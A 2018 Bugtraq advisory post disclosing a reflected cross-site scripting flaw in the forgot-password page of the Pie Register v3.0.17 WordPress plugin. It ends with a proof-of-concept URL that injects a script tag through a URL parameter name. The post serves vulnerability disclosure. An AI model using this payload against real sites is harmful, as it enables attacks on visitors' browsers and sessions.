[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201810190611.w9J6BslQ025246@ip-100-122-153-233.us-east-1.ec2.aws.symcpe.net>
Date: Fri, 19 Oct 2018 06:11:54 GMT
From: Socket_0x03@...aexe.com
To: bugtraq@...urityfocus.com
Subject: Pie Register v3.0.17 (WordPress Plugin) - XSS Vulnerability in
Forgot-Password
===============================================================================================
Pie Register v3.0.17 (WordPress Plugin) - Cross-Site Scripting Vulnerability in Forgot-Password
===============================================================================================
____________________________________________________________________________________
# Exploit Title: Pie Register v3.0.17 (WordPress Plugin) - XSS Vulnerability in Forgot-Password
# Date: [10-19-2018]
# Category: Webapps
____________________________________________________________________________________
# Author: Socket_0x03 (Alvaro J. Gene)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www.teraexe.com
____________________________________________________________________________________
# Software Link: https://wordpress.org/plugins/pie-register
# Plugin: Pie Register
# Version: v3.0.17 (last version)
# File: Forgot-Password
# Language: This application is available in English language.
# Plugin Description: Pie Register is a WordPress plugin that an administrator can
use to create different kinds of forms without programming knowledge. In addition,
an administrator can use Pie Register for payment features; for example, if an
administrator is using Pie Register to provide some kind of service, he/she can
charge an amount to his/her users via PayPal.
____________________________________________________________________________________
# Cross-Site Scripting Vulnerability:
Name of an arbitrarily supplied URL parameter:
http://www.website.com/wordpress/index.php/forgot-password/?i4pk8"><script>alert(23)</script>t28bu=1
Powered by blists - more mailing lists